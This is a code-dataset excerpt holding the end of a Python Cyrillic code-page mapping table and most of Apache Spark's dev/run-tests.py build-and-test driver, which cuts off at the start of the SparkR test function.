    0x0029: 0x0029,  # RIGHT PARENTHESIS
    0x002a: 0x002a,  # ASTERISK
    0x002b: 0x002b,  # PLUS SIGN
    0x002c: 0x002c,  # COMMA
    0x002d: 0x002d,  # HYPHEN-MINUS
    0x002e: 0x002e,  # FULL STOP
    0x002f: 0x002f,  # SOLIDUS
    0x0030: 0x0030,  # DIGIT ZERO
    0x0031: 0x0031,  # DIGIT ONE
    0x0032: 0x0032,  # DIGIT TWO
    0x0033: 0x0033,  # DIGIT THREE
    0x0034: 0x0034,  # DIGIT FOUR
    0x0035: 0x0035,  # DIGIT FIVE
    0x0036: 0x0036,  # DIGIT SIX
    0x0037: 0x0037,  # DIGIT SEVEN
    0x0038: 0x0038,  # DIGIT EIGHT
    0x0039: 0x0039,  # DIGIT NINE
    0x003a: 0x003a,  # COLON
    0x003b: 0x003b,  # SEMICOLON
    0x003c: 0x003c,  # LESS-THAN SIGN
    0x003d: 0x003d,  # EQUALS SIGN
    0x003e: 0x003e,  # GREATER-THAN SIGN
    0x003f: 0x003f,  # QUESTION MARK
    0x0040: 0x0040,  # COMMERCIAL AT
    0x0041: 0x0041,  # LATIN CAPITAL LETTER A
    0x0042: 0x0042,  # LATIN CAPITAL LETTER B
    0x0043: 0x0043,  # LATIN CAPITAL LETTER C
    0x0044: 0x0044,  # LATIN CAPITAL LETTER D
    0x0045: 0x0045,  # LATIN CAPITAL LETTER E
    0x0046: 0x0046,  # LATIN CAPITAL LETTER F
    0x0047: 0x0047,  # LATIN CAPITAL LETTER G
    0x0048: 0x0048,  # LATIN CAPITAL LETTER H
    0x0049: 0x0049,  # LATIN CAPITAL LETTER I
    0x004a: 0x004a,  # LATIN CAPITAL LETTER J
    0x004b: 0x004b,  # LATIN CAPITAL LETTER K
    0x004c: 0x004c,  # LATIN CAPITAL LETTER L
    0x004d: 0x004d,  # LATIN CAPITAL LETTER M
    0x004e: 0x004e,  # LATIN CAPITAL LETTER N
    0x004f: 0x004f,  # LATIN CAPITAL LETTER O
    0x0050: 0x0050,  # LATIN CAPITAL LETTER P
    0x0051: 0x0051,  # LATIN CAPITAL LETTER Q
    0x0052: 0x0052,  # LATIN CAPITAL LETTER R
    0x0053: 0x0053,  # LATIN CAPITAL LETTER S
    0x0054: 0x0054,  # LATIN CAPITAL LETTER T
    0x0055: 0x0055,  # LATIN CAPITAL LETTER U
    0x0056: 0x0056,  # LATIN CAPITAL LETTER V
    0x0057: 0x0057,  # LATIN CAPITAL LETTER W
    0x0058: 0x0058,  # LATIN CAPITAL LETTER X
    0x0059: 0x0059,  # LATIN CAPITAL LETTER Y
    0x005a: 0x005a,  # LATIN CAPITAL LETTER Z
    0x005b: 0x005b,  # LEFT SQUARE BRACKET
    0x005c: 0x005c,  # REVERSE SOLIDUS
    0x005d: 0x005d,  # RIGHT SQUARE BRACKET
    0x005e: 0x005e,  # CIRCUMFLEX ACCENT
    0x005f: 0x005f,  # LOW LINE
    0x0060: 0x0060,  # GRAVE ACCENT
    0x0061: 0x0061,  # LATIN SMALL LETTER A
    0x0062: 0x0062,  # LATIN SMALL LETTER B
    0x0063: 0x0063,  # LATIN SMALL LETTER C
    0x0064: 0x0064,  # LATIN SMALL LETTER D
    0x0065: 0x0065,  # LATIN SMALL LETTER E
    0x0066: 0x0066,  # LATIN SMALL LETTER F
    0x0067: 0x0067,  # LATIN SMALL LETTER G
    0x0068: 0x0068,  # LATIN SMALL LETTER H
    0x0069: 0x0069,  # LATIN SMALL LETTER I
    0x006a: 0x006a,  # LATIN SMALL LETTER J
    0x006b: 0x006b,  # LATIN SMALL LETTER K
    0x006c: 0x006c,  # LATIN SMALL LETTER L
    0x006d: 0x006d,  # LATIN SMALL LETTER M
    0x006e: 0x006e,  # LATIN SMALL LETTER N
    0x006f: 0x006f,  # LATIN SMALL LETTER O
    0x0070: 0x0070,  # LATIN SMALL LETTER P
    0x0071: 0x0071,  # LATIN SMALL LETTER Q
    0x0072: 0x0072,  # LATIN SMALL LETTER R
    0x0073: 0x0073,  # LATIN SMALL LETTER S
    0x0074: 0x0074,  # LATIN SMALL LETTER T
    0x0075: 0x0075,  # LATIN SMALL LETTER U
    0x0076: 0x0076,  # LATIN SMALL LETTER V
    0x0077: 0x0077,  # LATIN SMALL LETTER W
    0x0078: 0x0078,  # LATIN SMALL LETTER X
    0x0079: 0x0079,  # LATIN SMALL LETTER Y
    0x007a: 0x007a,  # LATIN SMALL LETTER Z
    0x007b: 0x007b,  # LEFT CURLY BRACKET
    0x007c: 0x007c,  # VERTICAL LINE
    0x007d: 0x007d,  # RIGHT CURLY BRACKET
    0x007e: 0x007e,  # TILDE
    0x007f: 0x007f,  # DELETE
    0x00a0: 0x00ff,  # NO-BREAK SPACE
    0x00a4: 0x00fd,  # CURRENCY SIGN
    0x00b0: 0x00f8,  # DEGREE SIGN
    0x00b7: 0x00fa,  # MIDDLE DOT
    0x0401: 0x00f0,  # CYRILLIC CAPITAL LETTER IO
    0x0404: 0x00f2,  # CYRILLIC CAPITAL LETTER UKRAINIAN IE
    0x0407: 0x00f4,  # CYRILLIC CAPITAL LETTER YI
    0x040e: 0x00f6,  # CYRILLIC CAPITAL LETTER SHORT U
    0x0410: 0x0080,  # CYRILLIC CAPITAL LETTER A
    0x0411: 0x0081,  # CYRILLIC CAPITAL LETTER BE
    0x0412: 0x0082,  # CYRILLIC CAPITAL LETTER VE
    0x0413: 0x0083,  # CYRILLIC CAPITAL LETTER GHE
    0x0414: 0x0084,  # CYRILLIC CAPITAL LETTER DE
    0x0415: 0x0085,  # CYRILLIC CAPITAL LETTER IE
    0x0416: 0x0086,  # CYRILLIC CAPITAL LETTER ZHE
    0x0417: 0x0087,  # CYRILLIC CAPITAL LETTER ZE
    0x0418: 0x0088,  # CYRILLIC CAPITAL LETTER I
    0x0419: 0x0089,  # CYRILLIC CAPITAL LETTER SHORT I
    0x041a: 0x008a,  # CYRILLIC CAPITAL LETTER KA
    0x041b: 0x008b,  # CYRILLIC CAPITAL LETTER EL
    0x041c: 0x008c,  # CYRILLIC CAPITAL LETTER EM
    0x041d: 0x008d,  # CYRILLIC CAPITAL LETTER EN
    0x041e: 0x008e,  # CYRILLIC CAPITAL LETTER O
    0x041f: 0x008f,  # CYRILLIC CAPITAL LETTER PE
    0x0420: 0x0090,  # CYRILLIC CAPITAL LETTER ER
    0x0421: 0x0091,  # CYRILLIC CAPITAL LETTER ES
    0x0422: 0x0092,  # CYRILLIC CAPITAL LETTER TE
    0x0423: 0x0093,  # CYRILLIC CAPITAL LETTER U
    0x0424: 0x0094,  # CYRILLIC CAPITAL LETTER EF
    0x0425: 0x0095,  # CYRILLIC CAPITAL LETTER HA
    0x0426: 0x0096,  # CYRILLIC CAPITAL LETTER TSE
    0x0427: 0x0097,  # CYRILLIC CAPITAL LETTER CHE
    0x0428: 0x0098,  # CYRILLIC CAPITAL LETTER SHA
    0x0429: 0x0099,  # CYRILLIC CAPITAL LETTER SHCHA
    0x042a: 0x009a,  # CYRILLIC CAPITAL LETTER HARD SIGN
    0x042b: 0x009b,  # CYRILLIC CAPITAL LETTER YERU
    0x042c: 0x009c,  # CYRILLIC CAPITAL LETTER SOFT SIGN
    0x042d: 0x009d,  # CYRILLIC CAPITAL LETTER E
    0x042e: 0x009e,  # CYRILLIC CAPITAL LETTER YU
    0x042f: 0x009f,  # CYRILLIC CAPITAL LETTER YA
    0x0430: 0x00a0,  # CYRILLIC SMALL LETTER A
    0x0431: 0x00a1,  # CYRILLIC SMALL LETTER BE
    0x0432: 0x00a2,  # CYRILLIC SMALL LETTER VE
    0x0433: 0x00a3,  # CYRILLIC SMALL LETTER GHE
    0x0434: 0x00a4,  # CYRILLIC SMALL LETTER DE
    0x0435: 0x00a5,  # CYRILLIC SMALL LETTER IE
    0x0436: 0x00a6,  # CYRILLIC SMALL LETTER ZHE
    0x0437: 0x00a7,  # CYRILLIC SMALL LETTER ZE
    0x0438: 0x00a8,  # CYRILLIC SMALL LETTER I
    0x0439: 0x00a9,  # CYRILLIC SMALL LETTER SHORT I
    0x043a: 0x00aa,  # CYRILLIC SMALL LETTER KA
    0x043b: 0x00ab,  # CYRILLIC SMALL LETTER EL
    0x043c: 0x00ac,  # CYRILLIC SMALL LETTER EM
    0x043d: 0x00ad,  # CYRILLIC SMALL LETTER EN
    0x043e: 0x00ae,  # CYRILLIC SMALL LETTER O
    0x043f: 0x00af,  # CYRILLIC SMALL LETTER PE
    0x0440: 0x00e0,  # CYRILLIC SMALL LETTER ER
    0x0441: 0x00e1,  # CYRILLIC SMALL LETTER ES
    0x0442: 0x00e2,  # CYRILLIC SMALL LETTER TE
    0x0443: 0x00e3,  # CYRILLIC SMALL LETTER U
    0x0444: 0x00e4,  # CYRILLIC SMALL LETTER EF
    0x0445: 0x00e5,  # CYRILLIC SMALL LETTER HA
    0x0446: 0x00e6,  # CYRILLIC SMALL LETTER TSE
    0x0447: 0x00e7,  # CYRILLIC SMALL LETTER CHE
    0x0448: 0x00e8,  # CYRILLIC SMALL LETTER SHA
    0x0449: 0x00e9,  # CYRILLIC SMALL LETTER SHCHA
    0x044a: 0x00ea,  # CYRILLIC SMALL LETTER HARD SIGN
    0x044b: 0x00eb,  # CYRILLIC SMALL LETTER YERU
    0x044c: 0x00ec,  # CYRILLIC SMALL LETTER SOFT SIGN
    0x044d: 0x00ed,  # CYRILLIC SMALL LETTER E
    0x044e: 0x00ee,  # CYRILLIC SMALL LETTER YU
    0x044f: 0x00ef,  # CYRILLIC SMALL LETTER YA
    0x0451: 0x00f1,  # CYRILLIC SMALL LETTER IO
    0x0454: 0x00f3,  # CYRILLIC SMALL LETTER UKRAINIAN IE
    0x0457: 0x00f5,  # CYRILLIC SMALL LETTER YI
    0x045e: 0x00f7,  # CYRILLIC SMALL LETTER SHORT U
    0x2116: 0x00fc,  # NUMERO SIGN
    0x2219: 0x00f9,  # BULLET OPERATOR
    0x221a: 0x00fb,  # SQUARE ROOT
    0x2500: 0x00c4,  # BOX DRAWINGS LIGHT HORIZONTAL
    0x2502: 0x00b3,  # BOX DRAWINGS LIGHT VERTICAL
    0x250c: 0x00da,  # BOX DRAWINGS LIGHT DOWN AND RIGHT
    0x2510: 0x00bf,  # BOX DRAWINGS LIGHT DOWN AND LEFT
    0x2514: 0x00c0,  # BOX DRAWINGS LIGHT UP AND RIGHT
    0x2518: 0x00d9,  # BOX DRAWINGS LIGHT UP AND LEFT
    0x251c: 0x00c3,  # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
    0x2524: 0x00b4,  # BOX DRAWINGS LIGHT VERTICAL AND LEFT
    0x252c: 0x00c2,  # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
    0x2534: 0x00c1,  # BOX DRAWINGS LIGHT UP AND HORIZONTAL
    0x253c: 0x00c5,  # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
    0x2550: 0x00cd,  # BOX DRAWINGS DOUBLE HORIZONTAL
    0x2551: 0x00ba,  # BOX DRAWINGS DOUBLE VERTICAL
    0x2552: 0x00d5,  # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
    0x2553: 0x00d6,  # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
    0x2554: 0x00c9,  # BOX DRAWINGS DOUBLE DOWN AND RIGHT
    0x2555: 0x00b8,  # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
    0x2556: 0x00b7,  # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
    0x2557: 0x00bb,  # BOX DRAWINGS DOUBLE DOWN AND LEFT
    0x2558: 0x00d4,  # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
    0x2559: 0x00d3,  # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
    0x255a: 0x00c8,  # BOX DRAWINGS DOUBLE UP AND RIGHT
    0x255b: 0x00be,  # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
    0x255c: 0x00bd,  # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
    0x255d: 0x00bc,  # BOX DRAWINGS DOUBLE UP AND LEFT
    0x255e: 0x00c6,  # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
    0x255f: 0x00c7,  # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
    0x2560: 0x00cc,  # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
    0x2561: 0x00b5,  # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
    0x2562: 0x00b6,  # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
    0x2563: 0x00b9,  # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
    0x2564: 0x00d1,  # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
    0x2565: 0x00d2,  # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
    0x2566: 0x00cb,  # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
    0x2567: 0x00cf,  # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
    0x2568: 0x00d0,  # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
    0x2569: 0x00ca,  # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
    0x256a: 0x00d8,  # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
    0x256b: 0x00d7,  # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
    0x256c: 0x00ce,  # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
    0x2580: 0x00df,  # UPPER HALF BLOCK
    0x2584: 0x00dc,  # LOWER HALF BLOCK
    0x2588: 0x00db,  # FULL BLOCK
    0x258c: 0x00dd,  # LEFT HALF BLOCK
    0x2590: 0x00de,  # RIGHT HALF BLOCK
    0x2591: 0x00b0,  # LIGHT SHADE
    0x2592: 0x00b1,  # MEDIUM SHADE
    0x2593: 0x00b2,  # DARK SHADE
    0x25a0: 0x00fe,  # BLACK SQUARE
}
| bsd-3-clause |
andrewor14/spark | dev/run-tests.py | 10 | 23605 | #!/usr/bin/env python2
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import itertools
from optparse import OptionParser
import os
import random
import re
import sys
import subprocess
from collections import namedtuple
from sparktestsupport import SPARK_HOME, USER_HOME, ERROR_CODES
from sparktestsupport.shellutils import exit_from_command_with_retcode, run_cmd, rm_r, which
from sparktestsupport.toposort import toposort_flatten, toposort
import sparktestsupport.modules as modules
# -------------------------------------------------------------------------------------------------
# Functions for traversing module dependency graph
# -------------------------------------------------------------------------------------------------
def determine_modules_for_files(filenames):
    """
    Given a list of filenames, return the set of modules that contain those files.
    If a file is not associated with a more specific submodule, then this method will consider that
    file to belong to the 'root' module.

    >>> sorted(x.name for x in determine_modules_for_files(["python/pyspark/a.py", "sql/core/foo"]))
    ['pyspark-core', 'sql']
    >>> [x.name for x in determine_modules_for_files(["file_not_matched_by_any_subproject"])]
    ['root']
    """
    changed = set()
    for path in filenames:
        owners = [m for m in modules.all_modules if m.contains_file(path)]
        if owners:
            changed.update(owners)
        else:
            # A file that no submodule claims falls back to the catch-all root module.
            changed.add(modules.root)
    return changed
def identify_changed_files_from_git_commits(patch_sha, target_branch=None, target_ref=None):
    """
    Given a git commit and target ref, use the set of files changed in the diff in order to
    determine which modules' tests should be run.

    >>> [x.name for x in determine_modules_for_files( \
            identify_changed_files_from_git_commits("fc0a1475ef", target_ref="5da21f07"))]
    ['graphx']
    >>> 'root' in [x.name for x in determine_modules_for_files( \
         identify_changed_files_from_git_commits("50a0496a43", target_ref="6765ef9"))]
    True
    """
    if target_branch is None and target_ref is None:
        raise AttributeError("must specify either target_branch or target_ref")
    if target_branch is not None and target_ref is not None:
        raise AttributeError("must specify either target_branch or target_ref, not both")
    if target_branch is not None:
        # Fetch the branch so that a local ref with that name exists to diff against.
        run_cmd(['git', 'fetch', 'origin', str(target_branch + ':' + target_branch)])
        diff_target = target_branch
    else:
        diff_target = target_ref
    raw_output = subprocess.check_output(['git', 'diff', '--name-only', patch_sha, diff_target],
                                         universal_newlines=True)
    # Drop the empty strings produced by trailing newlines.
    return [name for name in raw_output.split('\n') if name]
def setup_test_environ(environ):
    """Export every key/value pair in *environ* into os.environ, logging each one."""
    print("[info] Setup the following environment variables for tests: ")
    for key, value in environ.items():
        print("%s=%s" % (key, value))
        os.environ[key] = value
def determine_modules_to_test(changed_modules):
    """
    Given a set of modules that have changed, compute the transitive closure of those modules'
    dependent modules in order to determine the set of modules that should be tested.

    Returns a topologically-sorted list of modules (ties are broken by sorting on module names).

    >>> [x.name for x in determine_modules_to_test([modules.root])]
    ['root']
    >>> [x.name for x in determine_modules_to_test([modules.build])]
    ['root']
    >>> [x.name for x in determine_modules_to_test([modules.graphx])]
    ['graphx', 'examples']
    >>> x = [x.name for x in determine_modules_to_test([modules.sql])]
    >>> x # doctest: +NORMALIZE_WHITESPACE
    ['sql', 'hive', 'mllib', 'sql-kafka-0-10', 'examples', 'hive-thriftserver',
     'pyspark-sql', 'sparkr', 'pyspark-mllib', 'pyspark-ml']
    """
    selected = set(changed_modules)
    for module in changed_modules:
        # Recursively pull in everything that depends on a changed module.
        selected |= determine_modules_to_test(module.dependent_modules)
    # If we need to run all of the tests, then we should short-circuit and return 'root'
    if modules.root in selected:
        return [modules.root]
    dependency_graph = {m: set(m.dependencies).intersection(selected) for m in selected}
    return toposort_flatten(dependency_graph, sort=True)
def determine_tags_to_exclude(changed_modules):
    """Collect the test tags of every module that is NOT in *changed_modules*."""
    return [tag
            for m in modules.all_modules
            if m not in changed_modules
            for tag in m.test_tags]
# -------------------------------------------------------------------------------------------------
# Functions for working with subprocesses and shell tools
# -------------------------------------------------------------------------------------------------
def determine_java_executable():
    """Will return the path of the java executable that will be used by Spark's
    tests or `None`"""
    # Mirror the build's lookup order: $JAVA_HOME/bin/java first, then `java` on $PATH.
    java_home = os.environ.get("JAVA_HOME")
    if java_home:
        candidate = which(os.path.join(java_home, "bin", "java"))
        if candidate:
            return candidate
    return which("java")
# Parsed Java version triple, e.g. "1.8.0_25" -> JavaVersion(major=1, minor=8, patch=0).
JavaVersion = namedtuple('JavaVersion', ['major', 'minor', 'patch'])
def determine_java_version(java_exe):
    """Given a valid java executable will return its version in named tuple format
    with accessors '.major', '.minor', '.patch'.

    (The docstring previously advertised an '.update' accessor that the
    JavaVersion namedtuple does not define.)
    """
    # `java -version` writes its banner to stderr, so merge it into stdout.
    raw_output = subprocess.check_output([java_exe, "-version"],
                                         stderr=subprocess.STDOUT,
                                         universal_newlines=True)
    raw_output_lines = raw_output.split('\n')

    # find raw version string, eg 'java version "1.8.0_25"'
    raw_version_str = next(x for x in raw_output_lines if " version " in x)

    # Use a raw string: '\d' in a plain literal is an invalid/deprecated escape.
    match = re.search(r'(\d+)\.(\d+)\.(\d+)', raw_version_str)

    major = int(match.group(1))
    minor = int(match.group(2))
    patch = int(match.group(3))

    return JavaVersion(major, minor, patch)
# -------------------------------------------------------------------------------------------------
# Functions for running the other build and test scripts
# -------------------------------------------------------------------------------------------------
def set_title_and_block(title, err_block):
    """Record the current error-code block in the environment and print a banner."""
    os.environ["CURRENT_BLOCK"] = str(ERROR_CODES[err_block])
    divider = '=' * 72
    print('')
    print(divider)
    print(title)
    print(divider)
def run_apache_rat_checks():
    """Run the Apache RAT license checks via dev/check-license."""
    set_title_and_block("Running Apache RAT checks", "BLOCK_RAT")
    script = os.path.join(SPARK_HOME, "dev", "check-license")
    run_cmd([script])
def run_scala_style_checks():
    """Run the Scala style checker via dev/lint-scala."""
    set_title_and_block("Running Scala style checks", "BLOCK_SCALA_STYLE")
    script = os.path.join(SPARK_HOME, "dev", "lint-scala")
    run_cmd([script])
def run_java_style_checks():
    """Run the Java style checker via dev/lint-java."""
    set_title_and_block("Running Java style checks", "BLOCK_JAVA_STYLE")
    script = os.path.join(SPARK_HOME, "dev", "lint-java")
    run_cmd([script])
def run_python_style_checks():
    """Run the Python style checker via dev/lint-python."""
    set_title_and_block("Running Python style checks", "BLOCK_PYTHON_STYLE")
    script = os.path.join(SPARK_HOME, "dev", "lint-python")
    run_cmd([script])
def run_sparkr_style_checks():
    """Run the R style checker (dev/lint-r) if R is on PATH; otherwise skip."""
    set_title_and_block("Running R style checks", "BLOCK_R_STYLE")
    if not which("R"):
        print("Ignoring SparkR style check as R was not found in PATH")
        return
    # R style check should be executed after `install-dev.sh`.
    # Since warnings about `no visible global function definition` appear
    # without the installation. SEE ALSO: SPARK-9121.
    run_cmd([os.path.join(SPARK_HOME, "dev", "lint-r")])
def build_spark_documentation():
    # Builds the Jekyll-based docs under docs/; exits the process if jekyll is missing.
    set_title_and_block("Building Spark Documentation", "BLOCK_DOCUMENTATION")
    # Consumed by the docs build; presumably parsed by the Jekyll config — confirm.
    os.environ["PRODUCTION"] = "1 jekyll build"

    os.chdir(os.path.join(SPARK_HOME, "docs"))

    jekyll_bin = which("jekyll")

    if not jekyll_bin:
        print("[error] Cannot find a version of `jekyll` on the system; please",
              " install one and retry to build documentation.")
        sys.exit(int(os.environ.get("CURRENT_BLOCK", 255)))
    else:
        run_cmd([jekyll_bin, "build"])

    # Restore the working directory changed above.
    os.chdir(SPARK_HOME)
def get_zinc_port():
    """Pick a random port for Zinc so concurrent builds on one host don't collide."""
    low, high = 3030, 4030
    return random.randrange(low, high)
def kill_zinc_on_port(zinc_port):
    """
    Kill the Zinc process running on the given port, if one exists.
    """
    template = ("/usr/sbin/lsof -P |grep %s | grep LISTEN "
                "| awk '{ print $2; }' | xargs kill")
    subprocess.check_call(template % zinc_port, shell=True)
def exec_maven(mvn_args=()):
    """Will call Maven in the current directory with the list of mvn_args passed
    in and returns the subprocess for any further processing.

    Fix: coerce *mvn_args* to a list before concatenating. The default value is
    a tuple, and ``list + tuple`` raises TypeError, so calling this with the
    default argument (or any tuple) previously crashed.
    """
    zinc_port = get_zinc_port()
    os.environ["ZINC_PORT"] = "%s" % zinc_port
    zinc_flag = "-DzincPort=%s" % zinc_port
    flags = [os.path.join(SPARK_HOME, "build", "mvn"), "--force", zinc_flag]
    run_cmd(flags + list(mvn_args))
    # Zinc keeps running after the build; reap it so ports aren't leaked.
    kill_zinc_on_port(zinc_port)
def exec_sbt(sbt_args=()):
    """Will call SBT in the current directory with the list of sbt_args passed
    in and returns the subprocess for any further processing.

    Fixes:
    - ``list + tuple`` raised TypeError when *sbt_args* was left as the
      default tuple; coerce to a list first.
    - The output-filter regex used bare ``[info]``/``[warn]``, which are
      character classes matching a single 'i'/'n'/'f'/'o' etc., so far more
      lines were suppressed than the intended literal "[info] ... Resolving"
      style lines. The brackets are now escaped.
    """
    sbt_cmd = [os.path.join(SPARK_HOME, "build", "sbt")] + list(sbt_args)

    sbt_output_filter = re.compile(r"^.*\[info\].*Resolving" + "|" +
                                   r"^.*\[warn\].*Merging" + "|" +
                                   r"^.*\[info\].*Including")

    # NOTE: echo "q" is needed because sbt on encountering a build file
    # with failure (either resolution or compilation) prompts the user for
    # input either q, r, etc to quit or retry. This echo is there to make it
    # not block.
    echo_proc = subprocess.Popen(["echo", "\"q\n\""], stdout=subprocess.PIPE)
    sbt_proc = subprocess.Popen(sbt_cmd,
                                stdin=echo_proc.stdout,
                                stdout=subprocess.PIPE)
    echo_proc.wait()
    # NOTE(review): the '' sentinel assumes text-mode (str) output; under
    # Python 3 stdout yields bytes — confirm if this script moves off python2.
    for line in iter(sbt_proc.stdout.readline, ''):
        if not sbt_output_filter.match(line):
            print(line, end='')
    retcode = sbt_proc.wait()

    if retcode != 0:
        exit_from_command_with_retcode(sbt_cmd, retcode)
def get_hadoop_profiles(hadoop_version):
    """
    For the given Hadoop version tag, return a list of Maven/SBT profile flags for
    building and testing against that Hadoop version.
    """
    profiles_by_version = {
        "hadoop2.6": ["-Phadoop-2.6"],
        "hadoop2.7": ["-Phadoop-2.7"],
    }
    try:
        return profiles_by_version[hadoop_version]
    except KeyError:
        print("[error] Could not find", hadoop_version, "in the list. Valid options",
              " are", profiles_by_version.keys())
        sys.exit(int(os.environ.get("CURRENT_BLOCK", 255)))
def build_spark_maven(hadoop_version):
    """Compile Spark (skipping tests) with Maven using the profiles for *hadoop_version*."""
    # Enable all of the profiles for the build:
    profiles = get_hadoop_profiles(hadoop_version) + modules.root.build_profile_flags
    args = profiles + ["clean", "package", "-DskipTests"]
    print("[info] Building Spark (w/Hive 1.2.1) using Maven with these arguments: ",
          " ".join(args))
    exec_maven(args)
def build_spark_sbt(hadoop_version):
    """Compile Spark plus the assembly jars that some tests rely on, using sbt."""
    # Enable all of the profiles for the build:
    profiles = get_hadoop_profiles(hadoop_version) + modules.root.build_profile_flags
    goals = ["test:package",  # Build test jars as some tests depend on them
             "streaming-kafka-0-8-assembly/assembly",
             "streaming-flume-assembly/assembly",
             "streaming-kinesis-asl-assembly/assembly"]
    args = profiles + goals
    print("[info] Building Spark (w/Hive 1.2.1) using SBT with these arguments: ",
          " ".join(args))
    exec_sbt(args)
def build_spark_unidoc_sbt(hadoop_version):
    """Build the combined Java/Scala API docs (sbt `unidoc`)."""
    set_title_and_block("Building Unidoc API Documentation", "BLOCK_DOCUMENTATION")
    # Enable all of the profiles for the build:
    profiles = get_hadoop_profiles(hadoop_version) + modules.root.build_profile_flags
    args = profiles + ["unidoc"]
    print("[info] Building Spark unidoc (w/Hive 1.2.1) using SBT with these arguments: ",
          " ".join(args))
    exec_sbt(args)
def build_spark_assembly_sbt(hadoop_version):
    """Build the assembly package with sbt, then (usually) the unidoc API docs."""
    # Enable all of the profiles for the build:
    build_profiles = get_hadoop_profiles(hadoop_version) + modules.root.build_profile_flags
    sbt_goals = ["assembly/package"]
    profiles_and_goals = build_profiles + sbt_goals
    print("[info] Building Spark assembly (w/Hive 1.2.1) using SBT with these arguments: ",
          " ".join(profiles_and_goals))
    exec_sbt(profiles_and_goals)

    # Note that we skip Unidoc build only if Hadoop 2.6 is explicitly set in this SBT build.
    # Due to a different dependency resolution in SBT & Unidoc by an unknown reason, the
    # documentation build fails on a specific machine & environment in Jenkins but it was unable
    # to reproduce. Please see SPARK-20343. This is a band-aid fix that should be removed in
    # the future.
    is_hadoop_version_2_6 = os.environ.get("AMPLAB_JENKINS_BUILD_PROFILE") == "hadoop2.6"
    if not is_hadoop_version_2_6:
        # Make sure that Java and Scala API documentation can be generated
        build_spark_unidoc_sbt(hadoop_version)
def build_apache_spark(build_tool, hadoop_version):
    """Will build Spark against Hive v1.2.1 given the passed in build tool (either `sbt` or
    `maven`). Defaults to using `sbt`."""
    set_title_and_block("Building Spark", "BLOCK_BUILD")

    rm_r("lib_managed")

    # Anything other than "maven" falls through to the sbt build.
    builder = build_spark_maven if build_tool == "maven" else build_spark_sbt
    builder(hadoop_version)
def detect_binary_inop_with_mima(hadoop_version):
    """Run the MiMa binary-compatibility checker (dev/mima) with the build profiles."""
    profiles = get_hadoop_profiles(hadoop_version) + modules.root.build_profile_flags
    set_title_and_block("Detecting binary incompatibilities with MiMa", "BLOCK_MIMA")
    run_cmd([os.path.join(SPARK_HOME, "dev", "mima")] + profiles)
def run_scala_tests_maven(test_profiles):
    """Execute the Scala test suites through Maven with the given profiles."""
    args = test_profiles + ["test", "--fail-at-end"]
    print("[info] Running Spark tests using Maven with these arguments: ",
          " ".join(args))
    exec_maven(args)
def run_scala_tests_sbt(test_modules, test_profiles):
    """Run the sbt test goals of *test_modules*; no-op when there are none."""
    goals = list(itertools.chain.from_iterable(m.sbt_test_goals for m in test_modules))
    if not goals:
        return
    args = test_profiles + goals
    print("[info] Running Spark tests using SBT with these arguments: ",
          " ".join(args))
    exec_sbt(args)
def run_scala_tests(build_tool, hadoop_version, test_modules, excluded_tags):
    """Function to properly execute all tests passed in as a set from the
    `determine_test_suites` function"""
    set_title_and_block("Running Spark unit tests", "BLOCK_SPARK_UNIT_TESTS")

    module_set = set(test_modules)

    # Deduplicate the build-profile flags contributed by each module.
    module_flags = set(itertools.chain.from_iterable(m.build_profile_flags for m in module_set))
    profiles = get_hadoop_profiles(hadoop_version) + list(module_flags)

    if excluded_tags:
        profiles += ['-Dtest.exclude.tags=' + ",".join(excluded_tags)]

    if build_tool == "maven":
        run_scala_tests_maven(profiles)
    else:
        run_scala_tests_sbt(module_set, profiles)
def run_python_tests(test_modules, parallelism):
    """Invoke python/run-tests, restricted to *test_modules* unless root is selected."""
    set_title_and_block("Running PySpark tests", "BLOCK_PYSPARK_UNIT_TESTS")

    command = [os.path.join(SPARK_HOME, "python", "run-tests")]
    if test_modules != [modules.root]:
        # Root means "everything", so only pass --modules for a narrower selection.
        command.append("--modules=%s" % ','.join(m.name for m in test_modules))
    command.append("--parallelism=%i" % parallelism)
    run_cmd(command)
def run_python_packaging_tests():
    """Run pip-installability tests (dev/run-pip-tests)."""
    set_title_and_block("Running PySpark packaging tests", "BLOCK_PYSPARK_PIP_TESTS")
    run_cmd([os.path.join(SPARK_HOME, "dev", "run-pip-tests")])
def run_build_tests():
    """Run the dependency/build consistency tests (dev/test-dependencies.sh)."""
    set_title_and_block("Running build tests", "BLOCK_BUILD_TESTS")
    run_cmd([os.path.join(SPARK_HOME, "dev", "test-dependencies.sh")])
    # Removed a stray trailing `pass` statement that was dead code.
def run_sparkr_tests():
